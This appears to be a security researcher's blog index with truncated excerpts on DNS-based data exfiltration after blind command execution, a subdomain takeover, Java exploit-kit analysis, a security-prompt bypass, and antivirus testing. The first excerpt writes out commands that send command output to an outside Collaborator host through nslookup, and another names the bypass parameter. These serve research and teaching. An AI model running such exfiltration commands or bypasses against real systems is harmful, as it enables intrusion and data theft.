Posts

Exfiltrating data from a restricted Windows environment using DNS

This post aims to show how I was able to perform an initial reconnaissance within the operating system without relying on other tools such as PowerShell, certutil or Living Off The Land (LOLBIN) binaries.

Scenario:
- Java web application vulnerable to a blind Remote Command Execution
- Egress filtering rules allowing only the DNS protocol
- Operating system: Windows Server 2003

After having found the vulnerability, the initial commands I needed were "whoami" and "cd". So, the idea was to save the output of a command to a file, prepend its content to the Burp Collaborator domain name and perform a DNS query, so that the output is received as a subdomain:

nslookup [OUTPUT COMMAND].agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net

For example:

whoami > tmpfile
set /p v1= < tmpfile
cmd /v /c "echo nslookup %v1%.agupwd5anlxgca0ldez33q0u0l6bu0.burpcollaborator.net"

The oneliner: whoami > tmpfile && set /p v1= < tmpfile && cmd /v /c

Telecom Italia (TIM) - Azure subdomain takeover

Subdomain takeover is a known technique that has become popular in recent years with the advent of cloud providers. At the end of April I was able to take over the timcafe.tim.it subdomain, which belongs to the Telecom Italia network.

What is subdomain takeover?

Basically, subdomain takeover is the process of hijacking someone else's subdomain. Let's take an example. When a company hosts a website in the cloud, let's say contoso.com hosts a web application on a cloud provider, they create a cloud application which has a unique DNS name, for example myapp.cloudprovider.com. Then, contoso.com wants to reach the web application from one of its subdomains, so they create a Canonical Name (CNAME) record on their DNS servers for myapp.contoso.com that maps one domain name (an alias) to another (the canonical name). In this case myapp.contoso.com is mapped to myapp.cloudprovider.com. Now if you resolve the domain name, this will be the output:

myapp.contoso.com CNAME myapp.cloudprovider

Styxy Cool Exploit Kit: One Applet to Exploit All Vulnerabilities

Styxy Cool Exploit Kit is a particular kit because it is a "merge" between the Cool and Styxy Exploit Kits. Here we are going to cover only the Java related exploits, so if you want to know what vulnerabilities it has and why it's called Styxy Cool, go check Kafeine's post here. Between the eighth and ninth of July two interesting things happened:
- Jar size increased from 5 Kb to 28 Kb
- Payload (Reveton) disappeared from Fiddler

Let's take a step back and analyze the exploit chain from the eighth of July. The first page /abortion-success_conductor.php displays a bunch of phrases about Yahoo France, but what it really does is check whether you have a vulnerable Java plugin installed in your browser. The page contains an instance of PluginDetect version 0.8 plus obfuscated JavaScript code. What does this code do? It takes the content of the textarea from /objection_confident_sulphur.html, since in the middle of the first page there is an iframe pointin

The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423)

From Java SE 7 update 11 Oracle has introduced a new security feature, a security warning, that prompts a window every time an applet requests execution. For example, if we want to execute the latest Java SE 7 update 17 exploit we get this warning. Yesterday Immunity published a blog post explaining a new vulnerability they found in the Java validation mechanism which allows an untrusted applet to execute without showing the warning. For in-depth details read their blog post here. Briefly, to bypass the above prompt you must call the applet with the parameter __applet_ssv_validated set to true. The only way to manipulate this parameter is to use a Java Network Launch Protocol (JNLP) file. According to Oracle there are two ways to use JNLP in a page:
- With the applet tag
- With JavaScript only

Let's first try the example with the applet tag. The code we're going to run is the latest publicly available Java exploit, CVE-2013-2423.

import java.applet.

32 AntiVirus versus the latest Java Exploit (CVE-2013-1493)

Imagine a scenario where someone wants to target your computer to get access to your files. This task can be accomplished in several ways, and one of them is using a Java exploit on a crafted/compromised website. What I want to test is how AntiVirus products handle "unknown" threats or forbidden behavior (an unsigned applet shouldn't be allowed to download files to your local disk). This test is based on basic/home/free products like Symantec AntiVirus and not Symantec Internet Security, which has more features. Some companies provide only Internet Security suites, so this cannot be a full comparison between these products. I tried to test every AntiVirus in this list but ended up with only 32, because some of them don't provide a free trial and for the others I was unable to find or install one. The important thing is that I covered all the major/popular AntiVirus products. The testing machine is a fully patched Windows 7 SP1 32 bit on VirtualBox with Java SE 7 update 15 an

Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)

At the beginning of the past week @EKWatcher spotted Cool Exploit Kit using the Java 7 update 11 vulnerability (CVE-2013-0431). This vulnerability had already been reported by Security Explorations on seclists a few days after Oracle issued update 11. I decided to take a look at it. I found a website infected by Cool EK that, after a successful exploitation, dropped Reveton into the "C:\Documents and Settings\<username>\Application Data" folder on Windows XP. The applet used by Cool EK was named would-blood.jar, and once opened with JD-GUI the result was this. As you can see it's obfuscated, not heavily, but obfuscated. The first thing to do when you want to start deobfuscating an applet is to find the init() function, which is the "starting point" and cannot be changed. Remember that for serialized applets the starting point is a function called start() instead of init(). The init function is inside the hw class. It's immediately evident that al